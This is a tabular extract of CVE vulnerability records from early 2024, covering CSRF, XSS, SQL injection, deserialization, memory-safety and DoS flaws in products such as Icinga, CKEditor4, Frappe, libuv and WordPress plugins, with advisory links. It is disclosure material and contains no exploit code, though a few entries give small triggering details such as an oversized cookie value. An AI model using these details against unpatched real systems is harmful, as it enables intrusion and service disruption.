CVE    2024    24820    Candidate    Icinga Director is a tool designed to make Icinga 2 configuration handling easy. None of Icinga Director's configuration forms used to manipulate the monitoring environment are protected against cross site request forgery (CSRF). It enables attackers to perform changes in the monitoring environment managed by Icinga Director without the awareness of the victim. Users of the map module in version 1.x, should immediately upgrade to v2.0. The mentioned XSS vulnerabilities in Icinga Web are already fixed as well and upgrades to the most recent release of the 2.9, 2.10 or 2.11 branch must be performed if not done yet. Any later major release is also suitable. Icinga Director will receive minor updates to the 1.8, 1.9, 1.10 and 1.11 branches to remedy this issue. Upgrade immediately to a patched release. If that is not feasible, disable the director module for the time being.    MISC:https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/   |   URL:https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/   |   MISC:https://github.com/Icinga/icingaweb2-module-director/security/advisories/GHSA-3mwp-5p5v-j6q3   |   URL:https://github.com/Icinga/icingaweb2-module-director/security/advisories/GHSA-3mwp-5p5v-j6q3   |   MISC:https://github.com/Icinga/icingaweb2/issues?q=is%3Aissue++is%3Aclosed+4979+4960+4947   |   URL:https://github.com/Icinga/icingaweb2/issues?q=is%3Aissue++is%3Aclosed+4979+4960+4947   |   MISC:https://github.com/nbuchwitz/icingaweb2-module-map/pull/86   |   URL:https://github.com/nbuchwitz/icingaweb2-module-map/pull/86   |   MISC:https://support.apple.com/en-is/guide/safari/sfri11471/16.0   |   URL:https://support.apple.com/en-is/guide/safari/sfri11471/16.0   |   MISC:https://www.chromium.org/updates/same-site/   |   URL:https://www.chromium.org/updates/same-site/    Assigned (20240131)
CVE    2024    2482    Candidate    A vulnerability has been found in Surya2Developer Hostel Management Service 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /check_availability.php of the component HTTP POST Request Handler. The manipulation of the argument oldpassword leads to observable response discrepancy. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256891.    MISC:VDB-256891 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256891   |   MISC:VDB-256891 | Surya2Developer Hostel Management Service HTTP POST Request check_availability.php observable response discrepancy   |   URL:https://vuldb.com/?id.256891   |   MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Username_and_Password_Enumeration%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md   |   URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Username_and_Password_Enumeration%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md    Assigned (20240315)
CVE    2024    24819    Candidate    icingaweb2-module-incubator is a working project of bleeding edge Icinga Web 2 libraries. In affected versions the class `gipfl\Web\Form` is the base for various concrete form implementations [1] and provides protection against cross site request forgery (CSRF) by default. This is done by automatically adding an element with a CSRF token to any form, unless explicitly disabled, but even if enabled, the CSRF token (sent during a client's submission of a form relying on it) is not validated. This enables attackers to perform changes on behalf of a user which, unknowingly, interacts with a prepared link or website. The version 0.22.0 is available to remedy this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Icinga/icingaweb2-module-incubator/commit/db7dc49585fee0b4e96be666d7f6009a74a1ccb5   |   URL:https://github.com/Icinga/icingaweb2-module-incubator/commit/db7dc49585fee0b4e96be666d7f6009a74a1ccb5   |   MISC:https://github.com/Icinga/icingaweb2-module-incubator/security/advisories/GHSA-p8vv-9pqq-rm8p   |   URL:https://github.com/Icinga/icingaweb2-module-incubator/security/advisories/GHSA-p8vv-9pqq-rm8p   |   MISC:https://github.com/search?q=gipfl%5CWeb%5CForm%3B&type=code   |   URL:https://github.com/search?q=gipfl%5CWeb%5CForm%3B&type=code    Assigned (20240131)
CVE    2024    24818    Candidate    EspoCRM is an Open Source Customer Relationship Management software. An attacker can inject arbitrary IP or domain in "Password Change" page and redirect victim to malicious page that could lead to credential stealing or another attack. This vulnerability is fixed in 8.1.2.    MISC:https://github.com/espocrm/espocrm/commit/3babdfa3399e328fb1bd83a1b4ed03d509f4c8e7   |   URL:https://github.com/espocrm/espocrm/commit/3babdfa3399e328fb1bd83a1b4ed03d509f4c8e7   |   MISC:https://github.com/espocrm/espocrm/security/advisories/GHSA-8gv6-8r33-fm7j   |   URL:https://github.com/espocrm/espocrm/security/advisories/GHSA-8gv6-8r33-fm7j    Assigned (20240131)
CVE    2024    24817    Candidate    Discourse Calendar adds the ability to create a dynamic calendar in the first post of a topic on the open-source discussion platform Discourse. Prior to version 0.4, event invitees created in topics in private categories or PMs (private messages) can be retrieved by anyone, even if they're not logged in. This problem is resolved in version 0.4 of the discourse-calendar plugin. While no known workaround is available, putting the site behind `login_required` will disallow this endpoint to be used by anonymous users, but logged in users can still get the list of invitees in the private topics.    MISC:https://github.com/discourse/discourse-calendar/commit/84ef46a38cf02748ecacad16c5d9c6fec12dc8da   |   URL:https://github.com/discourse/discourse-calendar/commit/84ef46a38cf02748ecacad16c5d9c6fec12dc8da   |   MISC:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-wwq5-g5cp-c69f   |   URL:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-wwq5-g5cp-c69f    Assigned (20240131)
CVE    2024    24816    Candidate    CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts.    MISC:https://ckeditor.com/cke4/addon/preview   |   URL:https://ckeditor.com/cke4/addon/preview   |   MISC:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb   |   URL:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb   |   MISC:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76   |   URL:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76    Assigned (20240131)
CVE    2024    24815    Candidate    CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability has been discovered in the core HTML parsing module in versions of CKEditor4 prior to 4.24.0-lts. It may affect all editor instances that enabled full-page editing mode or enabled CDATA elements in Advanced Content Filtering configuration (defaults to `script` and `style` elements). The vulnerability allows attackers to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. A fix is available in version 4.24.0-lts.    MISC:https://www.drupal.org/sa-contrib-2024-009   |   MISC:https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata   |   URL:https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata   |   MISC:https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html   |   URL:https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html   |   MISC:https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html   |   URL:https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html   |   MISC:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb   |   URL:https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb   |   MISC:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm   |   URL:https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm    Assigned (20240131)
CVE    2024    24814    Candidate    mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In affected versions missing input validation on mod_auth_openidc_session_chunks cookie value makes the server vulnerable to a denial of service (DoS) attack. An internal security audit has been conducted and the reviewers found that if they manipulated the value of the mod_auth_openidc_session_chunks cookie to a very large integer, like 99999999, the server struggles with the request for a long time and finally gets back with a 500 error. Making a few requests of this kind caused our server to become unresponsive. Attackers can craft requests that would make the server work very hard (and possibly become unresponsive) and/or crash with minimal effort. This issue has been addressed in version 2.4.15.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.    FEDORA:FEDORA-2024-3c0f2a2771   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7DKVEVREYAI4F46CQAVOTPL75WLOZOE/   |   MISC:https://github.com/OpenIDC/mod_auth_openidc/commit/4022c12f314bd89d127d1be008b1a80a08e1203d   |   URL:https://github.com/OpenIDC/mod_auth_openidc/commit/4022c12f314bd89d127d1be008b1a80a08e1203d   |   MISC:https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-hxr6-w4gc-7vvv   |   URL:https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-hxr6-w4gc-7vvv   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3751-1] libapache2-mod-auth-openidc security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00004.html    Assigned (20240131)
CVE    2024    24813    Candidate    Frappe is a full-stack web application framework. Prior to versions 14.64.0 and 15.0.0, SQL injection from a particular whitelisted method can result in access to data which the user doesn't have permission to access. Versions 14.64.0 and 15.0.0 contain a patch for this issue. No known workarounds are available.    MISC:https://github.com/frappe/frappe/security/advisories/GHSA-fxfv-7gwx-54jh   |   URL:https://github.com/frappe/frappe/security/advisories/GHSA-fxfv-7gwx-54jh    Assigned (20240131)
CVE    2024    24812    Candidate    Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and a tightly integrated client side library. Prior to versions 14.59.0 and 15.5.0, portal pages are susceptible to Cross-Site Scripting (XSS) which can be used to inject malicious JS code if user clicks on a malicious link. This vulnerability has been patched in versions 14.59.0 and 15.5.0. No known workarounds are available.    MISC:https://github.com/frappe/frappe/releases/tag/v14.59.0   |   URL:https://github.com/frappe/frappe/releases/tag/v14.59.0   |   MISC:https://github.com/frappe/frappe/releases/tag/v15.5.0   |   URL:https://github.com/frappe/frappe/releases/tag/v15.5.0   |   MISC:https://github.com/frappe/frappe/security/advisories/GHSA-7p3m-h76m-hg9v   |   URL:https://github.com/frappe/frappe/security/advisories/GHSA-7p3m-h76m-hg9v    Assigned (20240131)
CVE    2024    24811    Candidate    SQLAlchemyDA is a generic database adapter for ZSQL methods. A vulnerability found in versions prior to 2.2 allows unauthenticated execution of arbitrary SQL statements on the database to which the SQLAlchemyDA instance is connected. All users are affected. The problem has been patched in version 2.2. There is no workaround for the problem.    MISC:https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a   |   URL:https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a   |   MISC:https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw   |   URL:https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw    Assigned (20240131)
CVE    2024    24810    Candidate    WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. The .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges. This impacts any installer built with the WiX installer framework. This issue has been patched in version 4.0.4.    MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5   |   URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-7wh2-wxc7-9ph5    Assigned (20240131)
CVE    2024    2481    Candidate    A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0. Affected is an unknown function of the file /admin/manage-students.php. The manipulation of the argument del leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256890 is the identifier assigned to this vulnerability.    MISC:VDB-256890 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256890   |   MISC:VDB-256890 | Surya2Developer Hostel Management System manage-students.php access control   |   URL:https://vuldb.com/?id.256890   |   MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Broken_Access_Control%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md   |   URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/Broken_Access_Control%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md    Assigned (20240315)
CVE    2024    24808    Candidate    pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.    MISC:https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd   |   URL:https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd   |   MISC:https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5   |   URL:https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5    Assigned (20240131)
CVE    2024    24807    Candidate    Sulu is a highly extensible open-source PHP content management system based on the Symfony framework. There is an issue when inputting HTML into the Tag name. The HTML is executed when the tag name is listed in the auto complete form. Only admin users can create tags so they are the only ones affected. The problem is patched with version(s) 2.4.16 and 2.5.12.    MISC:https://github.com/sulu/sulu/releases/tag/2.4.16   |   URL:https://github.com/sulu/sulu/releases/tag/2.4.16   |   MISC:https://github.com/sulu/sulu/releases/tag/2.5.12   |   URL:https://github.com/sulu/sulu/releases/tag/2.5.12   |   MISC:https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv   |   URL:https://github.com/sulu/sulu/security/advisories/GHSA-gfrh-gwqc-63cv    Assigned (20240131)
CVE    2024    24806    Candidate    libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/libuv/libuv/commit/0f2d7e784a256b54b2385043438848047bc2a629   |   URL:https://github.com/libuv/libuv/commit/0f2d7e784a256b54b2385043438848047bc2a629   |   MISC:https://github.com/libuv/libuv/commit/3530bcc30350d4a6ccf35d2f7b33e23292b9de70   |   URL:https://github.com/libuv/libuv/commit/3530bcc30350d4a6ccf35d2f7b33e23292b9de70   |   MISC:https://github.com/libuv/libuv/commit/c858a147643de38a09dd4164758ae5b685f2b488   |   URL:https://github.com/libuv/libuv/commit/c858a147643de38a09dd4164758ae5b685f2b488   |   MISC:https://github.com/libuv/libuv/commit/e0327e1d508b8207c9150b6e582f0adf26213c39   |   URL:https://github.com/libuv/libuv/commit/e0327e1d508b8207c9150b6e582f0adf26213c39   |   MISC:https://github.com/libuv/libuv/security/advisories/GHSA-f74f-cvh7-c6q6   |   URL:https://github.com/libuv/libuv/security/advisories/GHSA-f74f-cvh7-c6q6   |   MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3752-1] libuv1 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00005.html   |   MLIST:[oss-security] 20240208 libuv 1.48.0 released, fixes CVE-2024-24806   |   URL:http://www.openwall.com/lists/oss-security/2024/02/08/2   |   MLIST:[oss-security] 20240211 Re: libuv 1.48.0 released, fixes CVE-2024-24806   |   URL:http://www.openwall.com/lists/oss-security/2024/02/11/1    Assigned (20240131)
CVE    2024    24805    Candidate    Missing Authorization vulnerability in Deepak anand WP Dummy Content Generator. This issue affects WP Dummy Content Generator: from n/a through 3.1.2.    MISC:https://patchstack.com/database/vulnerability/wp-dummy-content-generator/wordpress-wp-dummy-content-generator-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-dummy-content-generator/wordpress-wp-dummy-content-generator-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24804    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in websoudan MW WP Form allows Stored XSS. This issue affects MW WP Form: from n/a through 5.0.6.    MISC:https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mw-wp-form/wordpress-mw-wp-form-plugin-5-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24803    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPoperation Ultra Companion – Companion plugin for WPoperation Themes allows Stored XSS. This issue affects Ultra Companion – Companion plugin for WPoperation Themes: from n/a through 1.1.9.    MISC:https://patchstack.com/database/vulnerability/ultra-companion/wordpress-ultra-companion-plugin-1-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ultra-companion/wordpress-ultra-companion-plugin-1-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24802    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in John Tendik JTRT Responsive Tables. This issue affects JTRT Responsive Tables: from n/a through 4.1.9.    MISC:https://patchstack.com/database/vulnerability/jtrt-responsive-tables/wordpress-jtrt-responsive-tables-plugin-4-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/jtrt-responsive-tables/wordpress-jtrt-responsive-tables-plugin-4-1-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24801    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel – WordPress Owl Carousel Slider allows Stored XSS. This issue affects OWL Carousel – WordPress Owl Carousel Slider: from n/a through 1.4.0.    MISC:https://patchstack.com/database/vulnerability/lgx-owl-carousel/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/lgx-owl-carousel/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    2480    Candidate    A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0. This vulnerability affects unknown code of the component Executa Page. The manipulation of the argument Companhia/Planta/Agente de/Agente até leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256888. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256888 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256888   |   MISC:VDB-256888 | MHA Sistemas arMHAzena Executa Page sql injection   |   URL:https://vuldb.com/?id.256888   |   MISC:https://johnermac.github.io/cve/sqli/   |   URL:https://johnermac.github.io/cve/sqli/    Assigned (20240315)
CVE    2024    24799    Candidate    Missing Authorization vulnerability in WooCommerce WooCommerce Box Office. This issue affects WooCommerce Box Office: from n/a through 1.2.2.    MISC:https://patchstack.com/database/vulnerability/woocommerce-box-office/wordpress-woocommerce-box-office-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woocommerce-box-office/wordpress-woocommerce-box-office-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24798    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in SoniNow Team Debug. This issue affects Debug: from n/a through 1.10.    MISC:https://patchstack.com/database/vulnerability/debug/wordpress-debug-plugin-1-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/debug/wordpress-debug-plugin-1-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24797    Candidate    Deserialization of Untrusted Data vulnerability in G5Theme ERE Recently Viewed – Essential Real Estate Add-On. This issue affects ERE Recently Viewed – Essential Real Estate Add-On: from n/a through 1.3.    MISC:https://patchstack.com/database/vulnerability/ere-recently-viewed/wordpress-ere-recently-viewed-plugin-1-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ere-recently-viewed/wordpress-ere-recently-viewed-plugin-1-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24796    Candidate    Deserialization of Untrusted Data vulnerability in MagePeople Team Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin. This issue affects Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin: from n/a through 4.1.1.    MISC:https://patchstack.com/database/vulnerability/mage-eventpress/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mage-eventpress/wordpress-wpevently-plugin-4-1-1-php-object-injection-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24794    Candidate    A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image. The Use-After-Free happens in the `parse_meta_sequence_end()` parsing the Sequence Value Representations.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931    Assigned (20240130)
CVE    2024    24793    Candidate    A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image. The Use-After-Free happens in the `parse_meta_element_create()` parsing the elements in the File Meta Information header.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1931    Assigned (20240130)
CVE    2024    2479    Candidate    A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0. This affects an unknown part of the component Cadastro Page. The manipulation of the argument Query leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256887. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256887 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256887   |   MISC:VDB-256887 | MHA Sistemas arMHAzena Cadastro Page cross site scripting   |   URL:https://vuldb.com/?id.256887   |   MISC:https://johnermac.github.io/cve/xss/   |   URL:https://johnermac.github.io/cve/xss/    Assigned (20240315)
CVE    2024    24786    Candidate    The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.    FEDORA:FEDORA-2024-5bae6c0ea7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDMBHAVSDU2FBDZ45U3A2VLSM35OJ2HU/   |   MISC:https://go.dev/cl/569356   |   URL:https://go.dev/cl/569356   |   MISC:https://pkg.go.dev/vuln/GO-2024-2611   |   URL:https://pkg.go.dev/vuln/GO-2024-2611    Assigned (20240130)
CVE    2024    24785    Candidate    If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.    MISC:https://go.dev/cl/564196   |   URL:https://go.dev/cl/564196   |   MISC:https://go.dev/issue/65697   |   URL:https://go.dev/issue/65697   |   MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   MISC:https://pkg.go.dev/vuln/GO-2024-2610   |   URL:https://pkg.go.dev/vuln/GO-2024-2610    Assigned (20240130)
CVE    2024    24784    Candidate    The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.    MISC:https://go.dev/cl/555596   |   URL:https://go.dev/cl/555596   |   MISC:https://go.dev/issue/65083   |   URL:https://go.dev/issue/65083   |   MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   MISC:https://pkg.go.dev/vuln/GO-2024-2609   |   URL:https://pkg.go.dev/vuln/GO-2024-2609    Assigned (20240130)
CVE    2024    24783    Candidate    Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.    MISC:https://go.dev/cl/569339   |   URL:https://go.dev/cl/569339   |   MISC:https://go.dev/issue/65390   |   URL:https://go.dev/issue/65390   |   MISC:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   URL:https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg   |   MISC:https://pkg.go.dev/vuln/GO-2024-2598   |   URL:https://pkg.go.dev/vuln/GO-2024-2598    Assigned (20240130)
CVE    2024    24782    Candidate    An unauthenticated attacker can send a ping request from one network to another through an error in the origin verification even though the ports are separated by VLAN.    MISC:https://cert.vde.com/en/advisories/VDE-2024-013   |   URL:https://cert.vde.com/en/advisories/VDE-2024-013    Assigned (20240130)
CVE    2024    24781    Candidate    An unauthenticated remote attacker can use an uncontrolled resource consumption vulnerability to DoS the affected devices through excessive traffic on a single ethernet port.    MISC:https://cert.vde.com/en/advisories/VDE-2024-013   |   URL:https://cert.vde.com/en/advisories/VDE-2024-013    Assigned (20240130)
CVE    2024    2478    Candidate    A vulnerability was found in BradWenqiang HR 2.0. It has been rated as critical. Affected by this issue is the function selectAll of the file /bishe/register of the component Background Management. The manipulation of the argument userName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256886 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256886 | BradWenqiang HR Background Management register selectAll sql injection   |   URL:https://vuldb.com/?id.256886   |   MISC:VDB-256886 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256886   |   MISC:https://github.com/zuizui35/cve/blob/main/cve.md   |   URL:https://github.com/zuizui35/cve/blob/main/cve.md    Assigned (20240315)
CVE    2024    24779    Candidate    Apache Superset with custom roles that include `can write on dataset` and without all data access permissions, allows for users to create virtual datasets to data they don't have access to. These users could then use those virtual datasets to get access to unauthorized data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.    MISC:https://lists.apache.org/thread/xzhz1m5bb9zxhyqgoy4q2d689b3zp4pq   |   URL:https://lists.apache.org/thread/xzhz1m5bb9zxhyqgoy4q2d689b3zp4pq   |   MLIST:[oss-security] 20240228 CVE-2024-24779: Apache Superset: Improper data authorization when creating a new dataset   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/6    Assigned (20240130)
CVE    2024    24776    Candidate    Mattermost fails to check the required permissions in the POST /api/v4/channels/stats/member_count API resulting in channel member counts being leaked to a user without permissions.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240130)
CVE    2024    24775    Candidate    When a virtual server is enabled with VLAN group and SNAT listener is configured, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137333   |   URL:https://my.f5.com/manage/s/article/K000137333    Assigned (20240201)
CVE    2024    24774    Candidate    Mattermost Jira Plugin handling subscriptions fails to check the security level of an incoming issue or limit it based on the user who created the subscription resulting in registered users on Jira being able to create webhooks that give them access to all Jira issues.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240130)
CVE    2024    24773    Candidate    Improper parsing of nested SQL statements on SQLLab would allow authenticated users to surpass their data authorization scope. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue.    MISC:https://lists.apache.org/thread/h66fy6nj41cfx07zh7l552w6dmtjh501   |   URL:https://lists.apache.org/thread/h66fy6nj41cfx07zh7l552w6dmtjh501   |   MLIST:[oss-security] 20240228 CVE-2024-24773: Apache Superset: Improper validation of SQL statements allows for unauthorized access to data   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/4    Assigned (20240130)
